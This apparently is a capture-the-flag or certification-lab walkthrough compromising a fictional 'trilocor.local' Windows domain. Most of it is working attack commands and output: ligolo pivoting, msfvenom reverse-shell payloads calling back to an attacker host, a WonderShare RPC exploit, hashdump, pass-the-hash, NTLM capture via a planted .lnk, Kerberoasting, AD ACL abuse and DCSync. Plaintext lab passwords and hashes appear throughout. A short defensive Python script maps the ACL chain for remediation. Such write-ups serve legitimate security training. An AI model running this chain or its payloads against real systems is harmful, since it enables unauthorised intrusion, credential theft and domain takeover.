-rw-r--r--  1 root root    33 Jul 13 17:31 flag.txt
drwxr-xr-x  3 root root  4096 Oct  6  2021 snap

root@82b123332853:/hostsystem/root/.ssh# ls -la
total 12
drwx------ 2 root root 4096 Aug  3  2022 .
drwx------ 7 root root 4096 Jul 13 17:31 ..
-rw------- 1 root root 1675 Aug  3  2022 id_rsa
-rw-r--r-- 1 root root  400 Aug  3  2022 id_rsa.pub

$ ssh -i id_rsa root@10.129.xxx.xxx

Pivoting to 172.16.139.0/24

# Downloading Binaries
$ mkdir ligolo && cd ligolo
$ wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.6.2/ligolo-ng_agent_0.6.2_linux_amd64.tar.gz
$ wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.6.2/ligolo-ng_proxy_0.6.2_linux_amd64.tar.gz
$ tar -xvzf ligolo-ng_agent_0.6.2_linux_amd64.tar.gz
$ tar -xvzf ligolo-ng_proxy_0.6.2_linux_amd64.tar.gz
$ rm LICENSE README.md ligolo-ng_agent_0.6.2_linux_amd64.tar.gz ligolo-ng_proxy_0.6.2_linux_amd64.tar.gz

# Setting up interfaces
$ sudo ip tuntap add user kali mode tun ligolo
$ sudo ip link set ligolo up

# Hosting ligolo agent
kali@kali:~/ligolo$ python3 -m http.server 80

# Starting proxy
kali@kali:~/ligolo$ ./proxy -selfcert

Downloading the Agent Binary on the Target System

root@WEB-NIX01:~$ wget http://10.10.14.4/ligolo/agent
root@WEB-NIX01:~$ chmod +x agent
root@WEB-NIX01:~$ ./agent -connect 10.10.14.4:11601 -ignore-cert
WARN[0000] warning, certificate validation disabled
INFO[0000] Connection established addr="10.10.14.4:11601"

Starting the session

In the ligolo-ng proxy interface:

ligolo-ng » session
ligolo-ng » start

Adding a Route for the Pivoted Network

kali@kali:~$ sudo ip route add 172.16.139.0/24 dev ligolo

The following hosts were found to be alive using tools like ping, nmap, fping and arp:

172.16.139.35
172.16.139.175
172.16.139.5

MS01

kali@kali:~/172.16.139.35$ sudo nmap -p- -sV -sC -T4 -A 172.16.139.35 -oN nmap-all-ports-full-scan.out
Nmap scan report for 172.16.139.35
Host is up (0.12s latency).
Not shown: 65511 closed tcp ports (reset)
PORT      STATE SERVICE              VERSION
111/tcp   open  rpcbind              2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc                Microsoft Windows RPC
139/tcp   open  netbios-ssn          Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
2049/tcp  open  nlockmgr             1-4 (RPC #100021)
3389/tcp  open  ms-wbt-server        Microsoft Terminal Services
| ssl-cert: Subject: commonName=MS01.trilocor.local
| Not valid before: 2024-04-12T17:30:38
|_Not valid after:  2025-01-11T17:30:38
|_ssl-date: 2024-07-14T04:27:26+00:00; 0s from scanner time.
| rdp-ntlm-info:
|   Target_Name: trilocor
|   NetBIOS_Domain_Name: trilocor
|   NetBIOS_Computer_Name: MS01
|   DNS_Domain_Name: trilocor.local
|   DNS_Computer_Name: MS01.trilocor.local
|   DNS_Tree_Name: trilocor.local
|   Product_Version: 10.0.17763
|_  System_Time: 2024-04-15T04:27:04+00:00
3700/tcp  open  giop                 CORBA naming service
|_giop-info: ERROR: Script execution failed (use -d to debug)
4848/tcp  open  http                 Oracle GlassFish application server 3.1.2.2 (Servlet/3.0 JSP/2.2 JSF/2.0 Java/1.7)
|_http-server-header: Oracle GlassFish Server 3.1.2.2
|_http-title: Login
5985/tcp  open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
7676/tcp  open  java-message-service Java Message Service 4.5.2 Patch 1
8080/tcp  open  http-proxy           Oracle GlassFish Server 3.1.2.2
|_http-server-header: Oracle GlassFish Server 3.1.2.2
| http-methods:
|_  Potentially risky methods: PUT DELETE TRACE
|_http-title: GlassFish Server 3.1.2 - Server Running
| fingerprint-strings:
|   GetRequest, HTTPOptions:
|     HTTP/1.1 200 OK
|     Content-Type: text/html
|     Content-Length: 4806
|     Date: Sun, 04 Jan 2024 04:24:02 GMT
|     Connection: close
|     <!--Arbortext, Inc., 1988-2008, v.4002-->
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
|     <html lang="en">
|     <!--
|     ALTER OR REMOVE COPYRIGHT NOTICES OR THIS HEADER.
|     Copyright (c) 2010, 2012 Oracle and/or its affiliates. All rights reserved.
|     subject to License Terms
|     <head>
|_    <style type="text/css"> body{margin-top:0} body,td,p,div,span,a,ul,ul li, ol, ol li, ol li b, dl,h1,h2,h3,h4,h5,h6,li { font-family:geneva,helvetica,arial,"lucida sans",sans-serif; font-size:10pt } h1 {font-size:18pt} h2 {font-size:14pt} h3 {font-size:12pt} code,kbd,tt,pre { font-family:monaco,courier,"courier new"; font-size:10pt; } li {padding-bottom: 8px} p.copy, p.copy a { font-family:geneva,helvetica,arial,"lucida
|_http-open-proxy: Proxy might be redirecting requests
8181/tcp  open  ssl/intermapper?
|_ssl-date: 2024-07-14T04:27:26+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=MS01.trilocor.local/organizationName=Oracle Corporation/stateOrProvinceName=California/countryName=US
| Not valid before: 2022-07-26T13:21:24
|_Not valid after:  2032-07-23T13:21:24
8686/tcp  open  java-rmi             Java RMI
| rmi-dumpregistry:
|   MS01.trilocor.local/7676/jmxrmi
|     javax.management.remote.rmi.RMIServerImpl_Stub
|     @127.0.0.1:50971
|     extends
|       java.rmi.server.RemoteStub
|       extends
|         java.rmi.server.RemoteObject
|   jmxrmi
|     javax.management.remote.rmi.RMIServerImpl_Stub
|     @127.0.0.1:8686
|     extends
|       java.rmi.server.RemoteStub
|       extends
|_        java.rmi.server.RemoteObject
10000/tcp open  http                 Jetty 9.4.46.v20220331
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(9.4.46.v20220331)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
47001/tcp open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc                Microsoft Windows RPC
49665/tcp open  msrpc                Microsoft Windows RPC
49666/tcp open  msrpc                Microsoft Windows RPC
49667/tcp open  msrpc                Microsoft Windows RPC
49668/tcp open  msrpc                Microsoft Windows RPC
49669/tcp open  msrpc                Microsoft Windows RPC
49680/tcp open  msrpc                Microsoft Windows RPC
49681/tcp open  msrpc                Microsoft Windows RPC
49682/tcp open  msrpc                Microsoft Windows RPC
Aggressive OS guesses: Cisco 3500 XL switch (87%), Scientific Atlanta WebSTAR EPC2203 cable modem (85%), 3Com Baseline Switch 2924-SFP or Cisco ESW-520 switch or Allied Telesis AT-8000 series switch (85%), Allied Telesis AT-8000S; Dell PowerConnect 2824, 3448, 5316M, or 5324; Linksys SFE2000P, SRW2024, SRW2048, or SRW224G4; or TP-LINK TL-SL3428 switch (85%), Linksys SRW2008MP switch (85%), Cisco SG 300-10, Dell PowerConnect 2748, Linksys SLM2024, SLM2048, or SLM224P, or Netgear FS728TP or GS724TP switch (85%), Linksys SRW2000-series or Allied Telesyn AT-8000S switch (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: MS01, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:94:ae:b4 (VMware)
| smb2-time:
|   date: 2024-07-14T04:27:10
|_  start_date: N/A

TRACEROUTE
HOP RTT       ADDRESS
1   118.53 ms 172.16.139.35

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 3 IP addresses (3 hosts up) scanned in 517.16 seconds
NFS - 2049
kali@kali:~/172.16.139.35$ showmount -e 172.16.139.35
Export list for 172.16.139.35:
/MS01 (everyone)

kali@kali:~/172.16.139.35$ sudo mount -t nfs 172.16.139.35:/MS01 ./target-NFS/ -o nolock

kali@kali:~/172.16.139.35/target-NFS$ dir
apps dev docs prod public temp websites

kali@kali:~/172.16.139.35/target-NFS$ ls -al apps/
total 10
drwx------ 2 nobody nogroup   64 Jul 26  2022 .
drwx------ 2 nobody nogroup   64 Aug 19  2022 ..
drwx------ 2 nobody nogroup 4096 Jul 26  2022 glassfish [>> Helpful! <<]
drwx------ 2 nobody nogroup 4096 Jul 26  2022 jboss
drwx------ 2 nobody nogroup   64 Jul 26  2022 tomcat

Getting Initial Access

The contents of the file apps/glassfish/domains/domain1/config/local-password in the NFS share /MS01 can be used as a password to log in to the control panel as admin.

http://172.16.139.35:4848/

A malicious .war file generated using msfvenom can be used to get a shell by uploading it as a module/application.

kali@kali:~$ msfvenom -p java/meterpreter/reverse_tcp LHOST=172.16.139.10 LPORT=1234 -f war > glowfish_deploy.war
Payload size: 6216 bytes
Final size of war file: 6216 bytes

A meterpreter listener was set up to catch the reverse shell:

msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload java/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 0.0.0.0
msf6 exploit(multi/handler) > set LPORT 1234
msf6 exploit(multi/handler) > run

To catch the reverse shell, port 1234 on our first victim machine, WEB-NIX01, must be forwarded to our local port 1234.

[Agent : root@WEB-NIX01] » listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:1234
INFO[4063] Listener 0 created on remote agent!

The malicious .war file generated using msfvenom is uploaded to the GlassFish server.

Noting that it’s using the server name instead of the IP address, an entry was added to the hosts file:

kali@kali:~$ echo "172.16.139.35 ms01" | sudo tee -a /etc/hosts
172.16.139.35 ms01

Upon clicking the first link, a meterpreter session was established:

Privilege Escalation
From the shell obtained via the GlassFish service on ports 4848 and 8080, the user svc_glassfish was identified.

whoami /priv

To enable the necessary privileges, the EnableAllTokenPrivs.ps1 PowerShell script is used.
meterpreter > upload ~/Transferables/Windows/EnableAllTokenPrivs.ps1
[*] Uploading  : /home/kali/Transferables/Windows/EnableAllTokenPrivs.ps1 -> EnableAllTokenPrivs.ps1
[*] Uploaded -1.00 B of 3.37 KiB (-0.03%): /home/kali/Transferables/Windows/EnableAllTokenPrivs.ps1 -> EnableAllTokenPrivs.ps1
[*] Completed  : /home/kali/Transferables/Windows/EnableAllTokenPrivs.ps1 -> EnableAllTokenPrivs.ps1

PS C:\glassfish3\glassfish\domains\domain1\config> .\EnableAllTokenPrivs.ps1
PS C:\glassfish3\glassfish\domains\domain1\config> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeLoadDriverPrivilege         Load and unload device drivers Enabled
SeDebugPrivilege              Debug programs                 Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeCreateGlobalPrivilege       Create global objects          Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Upgrading from java/meterpreter/reverse_tcp to windows/x64/meterpreter/reverse_tcp.
kali@kali:~$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.139.10 LPORT=1234 -f exe -o reverse.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: reverse.exe

Uploading payload

Setting up a meterpreter handler

Executing reverse.exe to obtain a higher integrity meterpreter shell.

As SeDebugPrivilege is enabled, we can migrate to a higher-privilege process such as winlogon.exe:
C:\glassfish3\glassfish\domains\domain1\config> wmic process where "name='winlogon.exe'" get ProcessId,Name
Name          ProcessId
winlogon.exe  576
winlogon.exe  5596

meterpreter > migrate 576

After migration to winlogon.exe, initialize a new shell to confirm that it runs with NT AUTHORITY\SYSTEM privileges.

Post-Exploitation
PS C:\users\pthorpe_adm> Get-ChildItem -Include * -File -Recurse -Force -ErrorAction SilentlyContinue | Select-String -Pattern "WS01"

AppData\Roaming\Microsoft\Sticky Notes\StickyNotes.snt:8:\pard\tx360\tx720\tx1080\tx1440\tx1800\tx2160\tx2520\tx2880\tx3240\tx3600\tx3960\tx4320\tx4680\tx5040\tx5400\tx5760\tx6120\tx6480\tx6840\tx7200\tx7560\tx7920\tx8280\tx8640\tx9000\tx9360\tx9720\tx10080\tx10440\tx10800\tx11160\tx11520\f0\fs22 Test account provided by infra (172.16.139.175:WS01):\par

Downloading the StickyNotes.snt for further analysis

meterpreter > download "C:\\users\\pthorpe_adm\\AppData\\Roaming\\Microsoft\\Sticky Notes\\StickyNotes.snt"
[*] Downloading: C:\users\pthorpe_adm\AppData\Roaming\Microsoft\Sticky Notes\StickyNotes.snt -> /home/kali/StickyNotes.snt
[*] Downloaded 9.00 KiB of 9.00 KiB (100.0%): C:\users\pthorpe_adm\AppData\Roaming\Microsoft\Sticky Notes\StickyNotes.snt -> /home/kali/StickyNotes.snt
[*] Completed  : C:\users\pthorpe_adm\AppData\Roaming\Microsoft\Sticky Notes\StickyNotes.snt -> /home/kali/StickyNotes.snt

WS01

Logging in using the previously obtained creds of devtest:
kali@kali:~$ xfreerdp /v:172.16.139.175 /u:devtest /p:D3vel0PEr@123

The WonderShare service was identified as vulnerable and can be exploited to escalate privileges using the following exploit:

# Imports
import msgpackrpc

# Variables
RADDR = "172.16.139.175"                             # host running the WonderShare msgpack-rpc service
RPORT = 12345                                        # port the service listens on
param = "C:\\Users\\devtest\\Desktop\\reverse.exe"   # msfvenom payload

# Initiate the shell: the service runs powershell with the payload path as its argument
client = msgpackrpc.Client(msgpackrpc.Address(RADDR, RPORT))
result = client.call('system_s', 'powershell', param)

kali@kali:~$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.139.10 LPORT=1234 -f exe -o reverse.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: reverse.exe

The generated payload (reverse.exe) was uploaded to the target system using
xfreerdp, which supports file copying and pasting through RDP sessions.
Setting up a meterpreter handler

To catch the reverse shell, the port 1234 on our first victim machine, WEB-NIX01, must be forwarded to our local port 1234.

[Agent : root@WEB-NIX01] » listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:1234
INFO[4063] Listener 0 created on remote agent!

Executing the exploit to trigger the reverse shell:

C:\Users\devtest\Desktop>"C:\Program Files\Python310\python.exe" exploit.py


meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0f280efc7d520ce6554f24f6ecee02d0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
devtest:1002:aad3b435b51404eeaad3b435b51404ee:0dec6c93cf0fb6306f72624ba6d92d0f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a18c38a95955fcc6ea8c0d978bba12bc:::

Enabling RDP authentication using NTLM hash

C:\Users\Administrator\Desktop>reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
The operation completed successfully.

Getting Administrator

kali@kali:~$ xfreerdp /v:172.16.139.175 /u:Administrator /pth:0f280efc7d520ce6554f24f6ecee02d0

Confirming Domain Membership

C:\WINDOWS\system32>systeminfo | findstr /B "Domain"
Domain: trilocor.local

Using SharpHound to collect data


C:\Users\Administrator\Desktop>.\SharpHound -c All --zipfilename TRILOCOR

Using LaZagne to identify stored credentials


C:\Users\Administrator\Desktop> .\LaZagne.exe all

DC01
Getting access as pthorpe using reused credentials:

# Writing to file because the password has special characters
kali@kali:~$ echo "-pl,MKO)9ijn" >> creds
kali@kali:~$ crackmapexec smb 172.16.139.3 -u 'pthorpe' -p creds
SMB         172.16.139.3    445    DC01    [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:trilocor.local) (signing:True) (SMBv1:False)
SMB         172.16.139.3    445    DC01    [+] trilocor.local\pthorpe:-pl,MKO)9ijn
User pthorpe has READ, WRITE access to the Print_jobs share.


Uploading malicious .lnk file

A malicious .lnk file can be uploaded to the Print_jobs share using the netexec tool with the slinky module. When the share is accessed, it enables us to capture the NTLM hash of the user.

kali@kali:~$ netexec smb 172.16.139.3 -u pthorpe -p creds -M slinky -o SERVER=172.16.139.10 NAME=important

Starting Responder
Forwarding local port 445 on WEB-NIX01 to the attacker's machine:

[Agent : root@WEB-NIX01] » listener_add --addr 0.0.0.0:445 --to 10.10.14.4:445
INFO[54769] Listener 1 created on remote agent!

After some time responder successfully captured hash of user trilocor\jflemming:


Cracking the captured hash using hashcat with the rockyou.txt wordlist:

kali@kali:~$ hashcat -m 5600 hash ~/Desktop/rockyou.txt
kali@kali:~$ hashcat -m 5600 hash ~/Desktop/rockyou.txt --show
JFLEMMING::trilocor:<REDACTED>:$$Bond@007$$
The user jflemming inherits GenericWrite permissions on the user trilocor\ksalinas from the HELP DESK MANAGERS group object. This allows jflemming to obtain a crackable hash of the user ksalinas: GenericWrite is enough to set a servicePrincipalName on the account, after which a service ticket encrypted with the account's password hash can be requested (targeted Kerberoasting).

kali@kali:/opt/targetedKerberoast$ python3 targetedKerberoast.py --dc-ip 172.16.139.3 -u jflemming -p '$$Bond@007$$' -d trilocor.local --request-user KSALINAS
Cracking the password hash of user trilocor\ksalinas using hashcat with the rockyou.txt wordlist:

kali@kali:~$ hashcat -m 13100 ksalinas_hash ~/Desktop/rockyou.txt
Enumerating ACLs as ksalinas

PS C:\Users\Administrator\Desktop> $sid = Convert-NameToSid ksalinas
PS C:\Users\Administrator\Desktop> Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}

ObjectDN              : CN=MSSP Connect,OU=Security Groups,OU=Corp,DC=trilocor,DC=local
ObjectSID             : S-1-5-21-748909465-2105014040-255522671-1715
ActiveDirectoryRights : Self
BinaryLength          : 36
AceQualifier          : AccessAllowed
IsCallback            : False
OpaqueLength          : 0
AccessMask            : 8
SecurityIdentifier    : S-1-5-21-748909465-2105014040-255522671-4632
AceType               : AccessAllowed
AceFlags              : ContainerInherit
IsInherited           : False
InheritanceFlags      : ContainerInherit
PropagationFlags      : None
AuditFlags            : None

In Active Directory (AD), “Self-Membership” allows a user to add themselves to a specific security group, enabling self-management of group membership without admin intervention. This allows us to add the user ksalinas to the MSSP Connect group, granting them all the privileges of that group:

PS C:\Users\Administrator\Desktop> $SecPassword = ConvertTo-SecureString 'atm@#5' -AsPlainText -Force
PS C:\Users\Administrator\Desktop> $Cred = New-Object System.Management.Automation.PSCredential('trilocor.local\ksalinas', $SecPassword)
PS C:\Users\Administrator\Desktop> Add-DomainGroupMember -Identity 'MSSP Connect' -Members 'ksalinas' -Credential $Cred -Verbose
PS C:\Users\Administrator\Desktop> Get-DomainGroupMember -Identity "MSSP Connect" | Select MemberName

The members of the MSSP CONNECT group have the WriteOwner privilege on the TIER I
INFRASTRUCTURE group object.

The WriteOwner permission in Active Directory (AD) allows a user to change the
ownership of an object.
Change ownership of TIER I INFRASTRUCTURE to ksalinas

PS C:\Users\Administrator\Desktop> $SecPassword = ConvertTo-SecureString 'atm@#5' -AsPlainText -Force
PS C:\Users\Administrator\Desktop> $Cred = New-Object System.Management.Automation.PSCredential('trilocor.local\ksalinas', $SecPassword)
PS C:\Users\Administrator\Desktop> Set-DomainObjectOwner -Credential $Cred -Identity "TIER I INFRASTRUCTURE" -OwnerIdentity ksalinas
PS C:\Users\Administrator\Desktop> Add-DomainObjectAcl -Rights 'All' -TargetIdentity "TIER I INFRASTRUCTURE" -PrincipalIdentity "ksalinas" -Credential $Cred -Domain trilocor.local

Adding ksalinas to TIER I INFRASTRUCTURE

PS C:\Users\Administrator\Desktop> Add-DomainGroupMember -Identity "TIER I INFRASTRUCTURE" -Members 'ksalinas' -Credential $Cred -Verbose
PS C:\Users\Administrator\Desktop> Get-DomainGroupMember -Identity "TIER I INFRASTRUCTURE" | Select MemberName

The members of TIER I INFRASTRUCTURE have GenericWrite on the FILESHARE ADMINS group object:

In Active Directory, GenericWrite allows modification of most object attributes, excluding restricted ones like the Security Descriptor.

Adding ksalinas to the group FILESHARE ADMINS

kali@kali:/opt/bloodyAD$ python3 bloodyAD.py --host 172.16.139.3 -u ksalinas -p 'atm@#5' -d bloody add groupMember 'FILESHARE ADMINS' 'ksalinas'
[+] ksalinas added to FILESHARE ADMINS

The user ksalinas inherits READ, WRITE on the share Department Shares from the FILESHARE ADMINS group.

kali@kali:~/CPTS/172.16.139.3$ smbclient //172.16.139.3/'Department Shares' -U 'ksalinas%atm@#5'
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Tue Jan 16 12:54:25 2023
  ..                                  D        0  Tue Jan 16 12:54:25 2023
  Accounting                          D        0  Tue Jul 26 17:37:20 2022
  Executives                          D        0  Tue Jul 26 17:37:17 2022
  Finance                             D        0  Tue Jul 26 17:37:14 2022
  HR                                  D        0  Tue Jul 26 17:37:03 2022
  IT                                  D        0  Tue Jul 26 17:37:00 2022
  Marketing                           D        0  Tue Jul 26 17:37:10 2022
  R&D                                 D        0  Tue Jul 26 17:37:07 2022

                10328063 blocks of size 4096. 6980936 blocks available
smb: \> cd IT
smb: \IT\> dir
  .                                   D        0  Tue Jul 26 17:37:00 2022
  ..                                  D        0  Tue Jul 26 17:37:00 2022
  Private                             D        0  Tue Jul 26 17:38:30 2022
  Public                              D        0  Tue Jul 26 17:37:43 2022

                10328063 blocks of size 4096. 6980936 blocks available
smb: \IT\> cd Private
smb: \IT\Private\> dir
  .                                   D        0  Tue Jul 26 17:38:30 2022
  ..                                  D        0  Tue Jul 26 17:38:30 2022
  Audit-OktaAppPermissions.ps1        A    25836  Wed Jul 27 00:01:44 2022
  AzureDBCopy.ps1                     A      814  Wed Jul 27 00:01:44 2022
  BulkDeleteMailbox.ps1               A      544  Wed Jul 27 00:01:44 2022
  CopyFileForAllUsers.ps1             A      739  Wed Jul 27 00:01:44 2022
  CreateNewServerADGroups.ps1         A      644  Wed Jul 27 00:01:44 2022
  GetRandomPassword.ps1               A      473  Wed Jul 27 00:01:44 2022
  IsPortOpen.ps1                      A      277  Wed Jul 27 00:01:44 2022
  IT_BACKUP02072022                   D        0  Tue Jul 26 17:38:30 2022
  many_to_many_MailboxFolderPermissions.ps1      A     3365  Wed Jul 27 00:01:44 2022
  OneDriveSetLimit.ps1                A     2040  Wed Jul 27 00:01:44 2022
  PreSysPrepClean.ps1                 A     2308  Wed Jul 27 00:01:44 2022
  Set-WindowsSleepSettings.ps1        A     1338  Wed Jul 27 00:01:44 2022
  UserLogons.vbs                      A     7484  Wed Jul 27 00:01:44 2022
  WhoShutItDown.ps1                   A      313  Wed Jul 27 00:01:44 2022
  WhyUserLockedOut.ps1                A      481  Wed Jul 27 00:01:44 2022

                10328063 blocks of size 4096. 6980936 blocks available
smb: \IT\Private\> cd IT_BACKUP02072022
smb: \IT\Private\IT_BACKUP02072022\> dir
  .                                   D        0  Tue Jul 26 17:38:30 2022
  ..                                  D        0  Tue Jul 26 17:38:30 2022
  Trilocor_backup_03072022.vc         A 16777216  Wed Jul 27 00:01:44 2022

                10328063 blocks of size 4096. 6980936 blocks available
smb: \IT\Private\IT_BACKUP02072022\> exit

kali@kali:~/CPTS/172.16.139.3$ sudo mount -t cifs //172.16.139.3/'Department Shares' . -o user=ksalinas
Password for ksalinas@//172.16.139.3/Department Shares:
kali@kali:~/CPTS/172.16.139.3/Department_Shares$ sudo cp IT/Private/IT_BACKUP02072022/Trilocor_backup_03072022.vc ../

Cracking the VeraCrypt vault using hashcat with the rockyou.txt wordlist:

kali@kali:~/CPTS$ hashcat -m 13751 Trilocor_backup_03072022.vc ~/Desktop/rockyou.txt
Mounting the veracrypt vault


The volume has been mounted to our machine. We can browse the volume simply by starting File Explorer and navigating to the V:\ drive.

The .psafe3 file requires a master password to be read:

Cracking the master password of the .psafe3 file using hashcat with the rockyou.txt wordlist:

kali@kali:~$ hashcat -m 5200 ./trilocor_svc_vault.psafe3 ~/Desktop/rockyou.txt

Using the software Password Safe, we can open the .psafe3 file containing the
password for user svc_trilocorsync:
Synchronicity_21
The user svc_trilocorsync has WriteDacl permission over the domain TRILOCOR.LOCAL:
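The rights chained in this section (GenericWrite on ksalinas, Self on MSSP Connect, WriteOwner on TIER I INFRASTRUCTURE, GenericWrite on FILESHARE ADMINS and WriteDacl on the domain) are exactly the ACEs a defender wants to locate and remove before an assessment finds them. The Python script below is an added example, not part of this report or of any tool it uses: it treats constructed ACEs modelled on this chain as a directed graph and lists every principal with a control path to a target object; it models ACL rights only, so the hop through the credential stored on the share is not on the graph and jflemming's ACL path ends at FILESHARE ADMINS.

```python
from collections import deque

# Rights that let the holder take over the target object (or its membership).
CONTROL_RIGHTS = {"GenericAll", "GenericWrite", "WriteOwner", "WriteDacl", "Self"}

# Constructed sample ACEs (holder, right, target), modelled on the chain in this report.
SAMPLE_ACES = [
    ("HELP DESK MANAGERS", "GenericWrite", "ksalinas"),
    ("ksalinas", "Self", "MSSP Connect"),
    ("MSSP Connect", "WriteOwner", "TIER I INFRASTRUCTURE"),
    ("TIER I INFRASTRUCTURE", "GenericWrite", "FILESHARE ADMINS"),
    ("svc_trilocorsync", "WriteDacl", "TRILOCOR.LOCAL"),
    ("Domain Admins", "GenericAll", "TRILOCOR.LOCAL"),
]
# Constructed group memberships: a member inherits the rights held by its groups.
SAMPLE_MEMBERS = {"jflemming": ["HELP DESK MANAGERS"], "Administrator": ["Domain Admins"]}


def build_graph(aces, memberships):
    """Directed graph: membership edges plus one edge per control-granting ACE."""
    graph = {}
    for member, groups in memberships.items():
        for group in groups:
            graph.setdefault(member, []).append((group, "MemberOf"))
    for holder, right, target in aces:
        if right in CONTROL_RIGHTS:
            graph.setdefault(holder, []).append((target, right))
    return graph


def control_path(graph, start, target):
    """Shortest chain of (right, object) hops from start to target, or None if unreachable."""
    queue, seen = deque([(start, [])]), {start}
    while queue:
        node, path = queue.popleft()
        if node == target:
            return path
        for nxt, right in graph.get(node, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, path + [(right, nxt)]))
    return None


def principals_controlling(graph, target):
    """Every principal with any control path to target: the list to review and remediate."""
    return sorted(p for p in graph if p != target and control_path(graph, p, target) is not None)


if __name__ == "__main__":
    graph = build_graph(SAMPLE_ACES, SAMPLE_MEMBERS)
    print("jflemming -> FILESHARE ADMINS:")
    for right, obj in control_path(graph, "jflemming", "FILESHARE ADMINS"):
        print(f"  -[{right}]-> {obj}")
    print("Can take over the domain:", principals_controlling(graph, "TRILOCOR.LOCAL"))
```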

Giving svc_trilocorsync DCSync Permission

PS C:\Users\Administrator\Desktop> Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted
PS C:\Users\Administrator\Desktop> Import-Module .\PowerView.ps1
PS C:\Users\Administrator\Desktop> $SecPassword = ConvertTo-SecureString 'Synchronicity_21' -AsPlainText -Force
PS C:\Users\Administrator\Desktop> $Cred = New-Object System.Management.Automation.PSCredential('trilocor.local\SVC_TRILOCORSYNC', $SecPassword)
PS C:\Users\Administrator\Desktop> Add-DomainObjectAcl -Credential $Cred -TargetIdentity "DC=TRILOCOR, DC=LOCAL" -PrincipalIdentity SVC_TRILOCORSYNC -Rights DCSync -verbose

Dumping hashes

kali@kali:~$ secretsdump.py -just-dc trilocor.local/SVC_TRILOCORSYNC@172.16.139.3
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:716ee2e3322df8be443de416ca20154f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f15e59fe4d6812b54e265d9a48354848:::
trilocor.local\avazquez:1724:aad3b435b51404eeaad3b435b51404ee:762cbc5ea2edfca03767427b2f2a909f:::
trilocor.local\pfalcon:1725:aad3b435b51404eeaad3b435b51404ee:f8e656de86b8b13244e7c879d8177539:::
<SNIP>

DC02
Enumerating domain users with an SPN set in domain TRILOCORAI.LOCAL:

PS C:\Users\Administrator\Documents> Get-DomainUser * -Domain TRILOCORAI.LOCAL -spn | select samaccountname

samaccountname
--------------
svc_datakeeper
krbtgt

User svc_datakeeper is Kerberoastable, meaning its service account can be targeted for Kerberos ticket extraction, allowing us to retrieve its hash.

C:\Users\Administrator\Documents> .\Rubeus.exe kerberoast /domain:trilocorai.local /user:svc_datakeeper /nowrap

Cracking the retrieved password hash using hashcat with the rockyou.txt wordlist:

kali@kali:~$ hashcat -m 13100 hash_svc_datakeeper ~/Desktop/rockyou.txt
